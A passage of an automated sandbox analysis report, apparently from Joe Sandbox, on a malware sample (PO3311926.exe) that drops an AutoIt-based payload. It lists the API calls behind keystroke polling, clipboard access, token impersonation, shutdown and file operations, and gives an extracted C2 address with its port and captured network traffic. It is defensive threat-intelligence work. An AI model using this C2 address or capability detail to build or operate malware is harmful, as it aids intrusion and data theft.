Source: C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.bin	Code function: 8_2_0060A0FA SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	8_2_0060A0FA
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.bin	Code function: 8_2_0060A488 FindFirstFileW,Sleep,FindNextFileW,FindClose,	8_2_0060A488
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.bin	Code function: 8_2_006065F1 FindFirstFileW,FindNextFileW,FindClose,	8_2_006065F1
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.bin	Code function: 8_2_005CC642 FindFirstFileExW,	8_2_005CC642
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.bin	Code function: 8_2_00607248 FindFirstFileW,FindClose,	8_2_00607248
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.bin	Code function: 8_2_006072E9 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,	8_2_006072E9
Source: C:\Users\user\wrse\sdadbtvsh.bin.exe	Code function: 20_2_00ACE387 lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,	20_2_00ACE387
Source: C:\Users\user\wrse\sdadbtvsh.bin.exe	Code function: 20_2_00ACD836 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	20_2_00ACD836
Source: C:\Users\user\wrse\sdadbtvsh.bin.exe	Code function: 20_2_00AD9F9F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	20_2_00AD9F9F
Source: C:\Users\user\wrse\sdadbtvsh.bin.exe	Code function: 20_2_00ADA0FA SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	20_2_00ADA0FA
Source: C:\Users\user\wrse\sdadbtvsh.bin.exe	Code function: 20_2_00ADA488 FindFirstFileW,Sleep,FindNextFileW,FindClose,	20_2_00ADA488
Source: C:\Users\user\wrse\sdadbtvsh.bin.exe	Code function: 20_2_00AD65F1 FindFirstFileW,FindNextFileW,FindClose,	20_2_00AD65F1
Source: C:\Users\user\wrse\sdadbtvsh.bin.exe	Code function: 20_2_00A9C642 FindFirstFileExW,	20_2_00A9C642
Source: C:\Users\user\wrse\sdadbtvsh.bin.exe	Code function: 20_2_00AD72E9 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,	20_2_00AD72E9
Source: C:\Users\user\wrse\sdadbtvsh.bin.exe	Code function: 20_2_00AD7248 FindFirstFileW,FindClose,	20_2_00AD7248
Source: C:\Users\user\wrse\sdadbtvsh.bin.exe	Code function: 20_2_00ACDB69 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	20_2_00ACDB69

Networking

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: 102.165.14.26

Source: global traffic

TCP traffic: 192.168.2.8:49708 -> 102.165.14.26:5007

Source: Joe Sandbox View

IP Address: 239.255.255.250 239.255.255.250

Source: Joe Sandbox View

ASN Name: ASDETUKhttpwwwheficedcomGB ASDETUKhttpwwwheficedcomGB

Source: Joe Sandbox View	JA3 fingerprint: 1138de370e523e824bbca92d049a3777
Source: Joe Sandbox View	JA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4

Source: unknown

HTTPS traffic detected: 23.206.229.226:443 -> 192.168.2.8:49707 version: TLS 1.0

Source: unknown	TCP traffic detected without corresponding DNS query: 52.182.143.211
Source: unknown	TCP traffic detected without corresponding DNS query: 23.206.229.226
Source: unknown	TCP traffic detected without corresponding DNS query: 23.206.229.226
Source: unknown	TCP traffic detected without corresponding DNS query: 52.182.143.211
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 23.206.229.226
Source: unknown	TCP traffic detected without corresponding DNS query: 23.206.229.226
Source: unknown	TCP traffic detected without corresponding DNS query: 23.206.229.226
Source: unknown	TCP traffic detected without corresponding DNS query: 52.182.143.211
Source: unknown	TCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknown	TCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknown	TCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknown	TCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknown	TCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknown	TCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknown	TCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknown	TCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknown	TCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknown	TCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknown	TCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknown	TCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknown	TCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknown	TCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknown	TCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknown	TCP traffic detected without corresponding DNS query: 23.206.229.226
Source: unknown	TCP traffic detected without corresponding DNS query: 23.206.229.226
Source: unknown	TCP traffic detected without corresponding DNS query: 23.206.229.226
Source: unknown	TCP traffic detected without corresponding DNS query: 23.206.229.226
Source: unknown	TCP traffic detected without corresponding DNS query: 23.206.229.226
Source: unknown	TCP traffic detected without corresponding DNS query: 23.206.229.226
Source: unknown	TCP traffic detected without corresponding DNS query: 102.165.14.26
Source: unknown	TCP traffic detected without corresponding DNS query: 102.165.14.26
Source: unknown	TCP traffic detected without corresponding DNS query: 102.165.14.26
Source: unknown	TCP traffic detected without corresponding DNS query: 102.165.14.26
Source: unknown	TCP traffic detected without corresponding DNS query: 23.206.229.226
Source: unknown	TCP traffic detected without corresponding DNS query: 102.165.14.26
Source: unknown	TCP traffic detected without corresponding DNS query: 72.21.81.240
Source: unknown	TCP traffic detected without corresponding DNS query: 72.21.81.240
Source: unknown	TCP traffic detected without corresponding DNS query: 102.165.14.26
Source: unknown	TCP traffic detected without corresponding DNS query: 102.165.14.26
Source: unknown	TCP traffic detected without corresponding DNS query: 102.165.14.26
Source: unknown	TCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknown	TCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknown	TCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknown	TCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknown	TCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknown	TCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknown	TCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknown	TCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknown	TCP traffic detected without corresponding DNS query: 20.12.23.50

Source: C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.bin

Code function: 8_2_0060D7A1 InternetReadFile,SetEvent,GetLastError,SetEvent,

8_2_0060D7A1

Source: global traffic	HTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=VT3pXKsaaw8sTtx&MD=cPzR33Sv HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
Source: global traffic	HTTP traffic detected: GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=VT3pXKsaaw8sTtx&MD=cPzR33Sv HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
Source: global traffic	HTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CIW2yQEIorbJAQipncoBCOj/ygEIkqHLAQiFoM0BCNy9zQEIucrNAQiK080BCMfUzQEIodbNAQio2M0BCPnA1BUYwcvMARi60s0BGMXYzQEY642lFw==Sec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /async/ddljson?async=ntp:2 HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CIW2yQEIorbJAQipncoBCOj/ygEIkqHLAQiFoM0BCNy9zQEIucrNAQiK080BCMfUzQEIodbNAQio2M0BCPnA1BUYwcvMARi60s0BGMXYzQEY642lFw==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /async/newtab_promos HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /sorry/index?continue=https://www.google.com/async/newtab_promos&q=EgRRtT5aGKXUvbEGIjD-kgWdpW8hT-9hc2nj_b9H1bs6sOSvG1viHx2oR-H037B_HudVAHyts9ARK3nBSXsyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: 1P_JAR=2024-04-29-09; NID=513=i4vGxEho67hIbT78H4sdvR3RiGAbuswNQATGLpxg1ZwbZWfPfJEEpO9gKebEs9GpjkyVn_LdpJxbX71dSG1YWSxKprI50Iw_R0SzrRyArmtuuOy3FX2os12m5mg3IOH4454YlQzymsc0wKOKj9gGLzAcNZLcSnF8tYSI_CuAr-Y
Source: global traffic	HTTP traffic detected: GET /sorry/index?continue=https://www.google.com/async/newtab_ogb%3Fhl%3Den-US%26async%3Dfixed:0&hl=en-US&q=EgRRtT5aGKXUvbEGIjDdp0aB_5C1gr2eixUtAMj4mBUQzkJ9vh0Q2d77njF6aqNILXZ84lvrwl1-Gwx1dfsyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CIW2yQEIorbJAQipncoBCOj/ygEIkqHLAQiFoM0BCNy9zQEIucrNAQiK080BCMfUzQEIodbNAQio2M0BCPnA1BUYwcvMARi60s0BGMXYzQEY642lFw==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: 1P_JAR=2024-04-29-09; NID=513=i4vGxEho67hIbT78H4sdvR3RiGAbuswNQATGLpxg1ZwbZWfPfJEEpO9gKebEs9GpjkyVn_LdpJxbX71dSG1YWSxKprI50Iw_R0SzrRyArmtuuOy3FX2os12m5mg3IOH4454YlQzymsc0wKOKj9gGLzAcNZLcSnF8tYSI_CuAr-Y
Source: global traffic	HTTP traffic detected: GET /fs/windows/config.json HTTP/1.1Connection: Keep-AliveAccept: /Accept-Encoding: identityIf-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMTRange: bytes=0-2147483646User-Agent: Microsoft BITS/7.8Host: fs.microsoft.com

Source: global traffic

DNS traffic detected: DNS query: www.google.com

Source: PO3311926.exe, 00000000.00000003.1398209942.0000000006C44000.00000004.00000020.00020000.00000000.sdmp, sdadbtvsh.bin, 00000008.00000003.1519361059.00000000017BA000.00000004.00000020.00020000.00000000.sdmp, sdadbtvsh.bin, 00000008.00000003.1541378259.00000000017BD000.00000004.00000020.00020000.00000000.sdmp, sdadbtvsh.bin.exe0.8.dr, sdadbtvsh.bin.0.dr, sdadbtvsh.bin.exe.8.dr, sdadbtvsh.bin.8.dr	String found in binary or memory: http://crl.globalsign.com/ca/gstsacasha384g4.crl0
Source: PO3311926.exe, 00000000.00000003.1398209942.0000000006C44000.00000004.00000020.00020000.00000000.sdmp, sdadbtvsh.bin, 00000008.00000003.1519361059.00000000017BA000.00000004.00000020.00020000.00000000.sdmp, sdadbtvsh.bin, 00000008.00000003.1541378259.00000000017BD000.00000004.00000020.00020000.00000000.sdmp, sdadbtvsh.bin.exe0.8.dr, sdadbtvsh.bin.0.dr, sdadbtvsh.bin.exe.8.dr, sdadbtvsh.bin.8.dr	String found in binary or memory: http://crl.globalsign.com/gscodesignsha2g3.crl0
Source: PO3311926.exe, 00000000.00000003.1398209942.0000000006C44000.00000004.00000020.00020000.00000000.sdmp, sdadbtvsh.bin, 00000008.00000003.1519361059.00000000017BA000.00000004.00000020.00020000.00000000.sdmp, sdadbtvsh.bin, 00000008.00000003.1541378259.00000000017BD000.00000004.00000020.00020000.00000000.sdmp, sdadbtvsh.bin.exe0.8.dr, sdadbtvsh.bin.0.dr, sdadbtvsh.bin.exe.8.dr, sdadbtvsh.bin.8.dr	String found in binary or memory: http://crl.globalsign.com/root-r3.crl0G
Source: PO3311926.exe, 00000000.00000003.1398209942.0000000006C44000.00000004.00000020.00020000.00000000.sdmp, sdadbtvsh.bin, 00000008.00000003.1519361059.00000000017BA000.00000004.00000020.00020000.00000000.sdmp, sdadbtvsh.bin, 00000008.00000003.1541378259.00000000017BD000.00000004.00000020.00020000.00000000.sdmp, sdadbtvsh.bin.exe0.8.dr, sdadbtvsh.bin.0.dr, sdadbtvsh.bin.exe.8.dr, sdadbtvsh.bin.8.dr	String found in binary or memory: http://crl.globalsign.com/root-r3.crl0c
Source: PO3311926.exe, 00000000.00000003.1398209942.0000000006C44000.00000004.00000020.00020000.00000000.sdmp, sdadbtvsh.bin, 00000008.00000003.1519361059.00000000017BA000.00000004.00000020.00020000.00000000.sdmp, sdadbtvsh.bin, 00000008.00000003.1541378259.00000000017BD000.00000004.00000020.00020000.00000000.sdmp, sdadbtvsh.bin.exe0.8.dr, sdadbtvsh.bin.0.dr, sdadbtvsh.bin.exe.8.dr, sdadbtvsh.bin.8.dr	String found in binary or memory: http://crl.globalsign.com/root-r6.crl0G
Source: PO3311926.exe, 00000000.00000003.1398209942.0000000006C44000.00000004.00000020.00020000.00000000.sdmp, sdadbtvsh.bin, 00000008.00000003.1519361059.00000000017BA000.00000004.00000020.00020000.00000000.sdmp, sdadbtvsh.bin, 00000008.00000003.1541378259.00000000017BD000.00000004.00000020.00020000.00000000.sdmp, sdadbtvsh.bin.exe0.8.dr, sdadbtvsh.bin.0.dr, sdadbtvsh.bin.exe.8.dr, sdadbtvsh.bin.8.dr	String found in binary or memory: http://ocsp.globalsign.com/ca/gstsacasha384g40C
Source: PO3311926.exe, 00000000.00000003.1398209942.0000000006C44000.00000004.00000020.00020000.00000000.sdmp, sdadbtvsh.bin, 00000008.00000003.1519361059.00000000017BA000.00000004.00000020.00020000.00000000.sdmp, sdadbtvsh.bin, 00000008.00000003.1541378259.00000000017BD000.00000004.00000020.00020000.00000000.sdmp, sdadbtvsh.bin.exe0.8.dr, sdadbtvsh.bin.0.dr, sdadbtvsh.bin.exe.8.dr, sdadbtvsh.bin.8.dr	String found in binary or memory: http://ocsp2.globalsign.com/gscodesignsha2g30V
Source: PO3311926.exe, 00000000.00000003.1398209942.0000000006C44000.00000004.00000020.00020000.00000000.sdmp, sdadbtvsh.bin, 00000008.00000003.1519361059.00000000017BA000.00000004.00000020.00020000.00000000.sdmp, sdadbtvsh.bin, 00000008.00000003.1541378259.00000000017BD000.00000004.00000020.00020000.00000000.sdmp, sdadbtvsh.bin.exe0.8.dr, sdadbtvsh.bin.0.dr, sdadbtvsh.bin.exe.8.dr, sdadbtvsh.bin.8.dr	String found in binary or memory: http://ocsp2.globalsign.com/rootr306
Source: PO3311926.exe, 00000000.00000003.1398209942.0000000006C44000.00000004.00000020.00020000.00000000.sdmp, sdadbtvsh.bin, 00000008.00000003.1519361059.00000000017BA000.00000004.00000020.00020000.00000000.sdmp, sdadbtvsh.bin, 00000008.00000003.1541378259.00000000017BD000.00000004.00000020.00020000.00000000.sdmp, sdadbtvsh.bin.exe0.8.dr, sdadbtvsh.bin.0.dr, sdadbtvsh.bin.exe.8.dr, sdadbtvsh.bin.8.dr	String found in binary or memory: http://ocsp2.globalsign.com/rootr606
Source: PO3311926.exe, 00000000.00000003.1398209942.0000000006C44000.00000004.00000020.00020000.00000000.sdmp, sdadbtvsh.bin, 00000008.00000003.1519361059.00000000017BA000.00000004.00000020.00020000.00000000.sdmp, sdadbtvsh.bin, 00000008.00000003.1541378259.00000000017BD000.00000004.00000020.00020000.00000000.sdmp, sdadbtvsh.bin.exe0.8.dr, sdadbtvsh.bin.0.dr, sdadbtvsh.bin.exe.8.dr, sdadbtvsh.bin.8.dr	String found in binary or memory: http://secure.globalsign.com/cacert/gscodesignsha2g3ocsp.crt08
Source: PO3311926.exe, 00000000.00000003.1398209942.0000000006C44000.00000004.00000020.00020000.00000000.sdmp, sdadbtvsh.bin, 00000008.00000003.1519361059.00000000017BA000.00000004.00000020.00020000.00000000.sdmp, sdadbtvsh.bin, 00000008.00000003.1541378259.00000000017BD000.00000004.00000020.00020000.00000000.sdmp, sdadbtvsh.bin.exe0.8.dr, sdadbtvsh.bin.0.dr, sdadbtvsh.bin.exe.8.dr, sdadbtvsh.bin.8.dr	String found in binary or memory: http://secure.globalsign.com/cacert/gstsacasha384g4.crt0
Source: PO3311926.exe, 00000000.00000003.1398209942.0000000006C44000.00000004.00000020.00020000.00000000.sdmp, sdadbtvsh.bin, 00000008.00000003.1519361059.00000000017BA000.00000004.00000020.00020000.00000000.sdmp, sdadbtvsh.bin, 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmp, sdadbtvsh.bin, 00000008.00000003.1541378259.00000000017BD000.00000004.00000020.00020000.00000000.sdmp, sdadbtvsh.bin.exe, 00000014.00000000.1648993329.0000000000B35000.00000002.00000001.01000000.0000000E.sdmp, sdadbtvsh.bin.exe, 0000001A.00000000.1866878871.0000000000B35000.00000002.00000001.01000000.0000000E.sdmp, sdadbtvsh.bin.exe, 00000023.00000002.2210000278.0000000000B35000.00000002.00000001.01000000.0000000E.sdmp, sdadbtvsh.bin.exe0.8.dr, sdadbtvsh.bin.0.dr, sdadbtvsh.bin.exe.8.dr, sdadbtvsh.bin.8.dr	String found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: PO3311926.exe, 00000000.00000003.1398209942.0000000006C44000.00000004.00000020.00020000.00000000.sdmp, sdadbtvsh.bin, 00000008.00000003.1519361059.00000000017BA000.00000004.00000020.00020000.00000000.sdmp, sdadbtvsh.bin, 00000008.00000003.1541378259.00000000017BD000.00000004.00000020.00020000.00000000.sdmp, sdadbtvsh.bin.exe0.8.dr, sdadbtvsh.bin.0.dr, sdadbtvsh.bin.exe.8.dr, sdadbtvsh.bin.8.dr	String found in binary or memory: https://www.autoitscript.com/autoit3/
Source: PO3311926.exe, 00000000.00000003.1398209942.0000000006C44000.00000004.00000020.00020000.00000000.sdmp, sdadbtvsh.bin, 00000008.00000003.1519361059.00000000017BA000.00000004.00000020.00020000.00000000.sdmp, sdadbtvsh.bin, 00000008.00000003.1541378259.00000000017BD000.00000004.00000020.00020000.00000000.sdmp, sdadbtvsh.bin.exe0.8.dr, sdadbtvsh.bin.0.dr, sdadbtvsh.bin.exe.8.dr, sdadbtvsh.bin.8.dr	String found in binary or memory: https://www.globalsign.com/repository/0

Source: unknown	Network traffic detected: HTTP traffic on port 49710 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49721
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49720
Source: unknown	Network traffic detected: HTTP traffic on port 49672 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49712 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49676 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49729 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49720 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49713 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49715 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49715
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49714
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49713
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49712
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49710
Source: unknown	Network traffic detected: HTTP traffic on port 49673 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49707 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 49705 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49703 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49671 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49724 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49728 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49721 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49707
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49729
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49728
Source: unknown	Network traffic detected: HTTP traffic on port 49714 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49705
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49703
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49724

Source: unknown	HTTPS traffic detected: 20.12.23.50:443 -> 192.168.2.8:49705 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.12.23.50:443 -> 192.168.2.8:49710 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.221.246.93:443 -> 192.168.2.8:49729 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.221.246.93:443 -> 192.168.2.8:49730 version: TLS 1.2

Source: C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.bin

Code function: 8_2_0060F45C OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,

8_2_0060F45C

Source: C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.bin	Code function: 8_2_0060F6C7 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,		8_2_0060F6C7
Source: C:\Users\user\wrse\sdadbtvsh.bin.exe	Code function: 20_2_00ADF6C7 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,		20_2_00ADF6C7

Source: C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.bin

8_2_0060F45C

Source: C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.bin

Code function: 8_2_005FA54A GetKeyboardState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,

8_2_005FA54A

Source: C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.bin	Code function: 8_2_00629ED5 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,		8_2_00629ED5
Source: C:\Users\user\wrse\sdadbtvsh.bin.exe	Code function: 20_2_00AF9ED5 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,		20_2_00AF9ED5

System Summary

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Source: C:\Windows\SysWOW64\wscript.exe

COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}

Jump to behavior

Source: C:\Users\user\Desktop\PO3311926.exe

Code function: 0_2_00BA6FAA: __EH_prolog,_wcslen,_wcslen,CreateFileW,CloseHandle,CreateDirectoryW,CreateFileW,DeviceIoControl,CloseHandle,GetLastError,RemoveDirectoryW,DeleteFileW,

0_2_00BA6FAA

Source: C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.bin

Code function: 8_2_005F1A91 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,

8_2_005F1A91

Source: C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.bin	Code function: 8_2_005FF122 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,		8_2_005FF122
Source: C:\Users\user\wrse\sdadbtvsh.bin.exe	Code function: 20_2_00ACF122 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,		20_2_00ACF122

Source: C:\Users\user\Desktop\PO3311926.exe	Code function: 0_2_00BA848E	0_2_00BA848E
Source: C:\Users\user\Desktop\PO3311926.exe	Code function: 0_2_00BB6CDC	0_2_00BB6CDC
Source: C:\Users\user\Desktop\PO3311926.exe	Code function: 0_2_00BB00B7	0_2_00BB00B7
Source: C:\Users\user\Desktop\PO3311926.exe	Code function: 0_2_00BB4088	0_2_00BB4088
Source: C:\Users\user\Desktop\PO3311926.exe	Code function: 0_2_00BA40FE	0_2_00BA40FE
Source: C:\Users\user\Desktop\PO3311926.exe	Code function: 0_2_00BC51C9	0_2_00BC51C9
Source: C:\Users\user\Desktop\PO3311926.exe	Code function: 0_2_00BB7153	0_2_00BB7153
Source: C:\Users\user\Desktop\PO3311926.exe	Code function: 0_2_00BA32F7	0_2_00BA32F7
